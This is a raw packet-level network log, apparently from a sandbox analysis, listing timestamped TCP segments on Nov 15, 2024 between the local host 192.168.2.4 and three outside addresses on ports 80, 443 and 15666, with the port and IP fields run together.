                                                                                                                                                                Nov 15, 2024 10:28:32.101480961 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101557016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101569891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101581097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101596117 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101608038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101625919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101634026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101634026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101634026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101638079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101708889 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101708889 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101752996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101766109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101778030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101902962 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.112668037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112682104 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112694025 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112741947 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.112785101 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112803936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112817049 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112828016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112840891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112852097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112864017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112914085 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.112914085 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.112914085 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.112941027 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112952948 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112965107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112976074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112988949 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112992048 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.112999916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.112992048 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.113034010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.113080025 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.113080025 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.113080025 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.113125086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.113137960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.113148928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.113195896 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.163336039 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:45.062159061 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:45.067733049 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:45.067804098 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:45.205365896 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:45.210541010 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:45.210721016 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:45.289891005 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:45.289923906 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:45.290117979 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:45.339112997 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:45.339138031 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:45.943871021 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:45.944674969 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:45.998176098 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:45.998203993 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:45.998471022 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:45.998547077 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:46.000193119 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:46.043327093 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:46.182415009 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:46.182590008 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:46.182647943 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:46.182647943 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:46.183305979 CET53977443192.168.2.4172.67.74.152
                                                                                                                                                                Nov 15, 2024 10:28:46.183342934 CET44353977172.67.74.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.927747011 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.932679892 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932693005 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932763100 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932773113 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932774067 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.932790995 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932801962 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932804108 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.932825089 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932842970 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932852983 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932862997 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.932879925 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.932918072 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.937841892 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.937855959 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.937913895 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.937916040 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.937932968 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.937972069 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938003063 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938014030 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.938065052 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938066959 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.938098907 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938147068 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938157082 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938162088 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.938180923 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938211918 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.938244104 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.938290119 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.943342924 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943453074 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943480968 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.943500996 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943512917 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943531036 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943542957 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943543911 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.943598986 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.943614006 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943631887 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943659067 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943671942 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.943686962 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943697929 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943702936 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.943717003 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943733931 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.943748951 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.943814993 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.948414087 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948445082 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948491096 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948519945 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948535919 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948540926 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.948590994 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.948606968 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948617935 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948708057 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948729992 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948755980 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948757887 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.948765993 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948807001 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948813915 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.948817968 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948851109 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948859930 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948908091 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.948909998 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948926926 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948940039 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.948966980 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.948968887 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949011087 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949043989 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949052095 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949131012 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949140072 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949160099 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949196100 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949228048 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949239016 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949289083 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949331045 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949341059 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949464083 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949474096 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949482918 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949493885 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949527979 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949539900 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949543953 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949573994 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949592113 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949603081 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949629068 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949634075 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949655056 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949673891 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949714899 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949728012 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949738979 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949748993 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949769974 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949770927 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949790001 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949800014 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949801922 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949836016 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949842930 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949861050 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949872971 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949881077 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949887991 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949924946 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.949944019 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949954987 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949980021 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.949990034 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950011969 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.950031042 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950041056 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950069904 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.950082064 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950122118 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.950124025 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950151920 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950161934 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950198889 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950217962 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.950300932 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950315952 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950325012 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950334072 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950342894 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950352907 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.950371027 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.950412989 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.953572035 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953583956 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953600883 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953614950 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953633070 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.953644991 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953655005 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953694105 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.953702927 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953718901 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953730106 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953738928 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953748941 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.953816891 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953828096 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953840017 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.953856945 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953867912 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953876972 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953917980 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.953947067 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953957081 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953965902 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.953984022 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954041004 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954073906 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954083920 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954092979 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954102039 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954113007 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954144955 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954145908 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954163074 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954170942 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954173088 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954211950 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954225063 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954241991 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954252005 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954298019 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954307079 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954346895 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954358101 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954402924 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954406023 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954427004 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954438925 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954463959 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954466105 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954503059 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954514027 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954545975 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954555988 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954555988 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954586983 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954598904 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954639912 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954651117 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954678059 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954689980 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954724073 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954734087 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954777002 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954787970 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.954819918 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954972982 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.954982042 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955010891 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.955244064 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.955250978 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955262899 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955281019 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955332041 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.955338955 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955382109 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955405951 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955421925 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.955446959 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955471039 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955512047 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:51.955565929 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955581903 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955600977 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:51.955617905 CET156665397645.130.145.152192.168.2.4
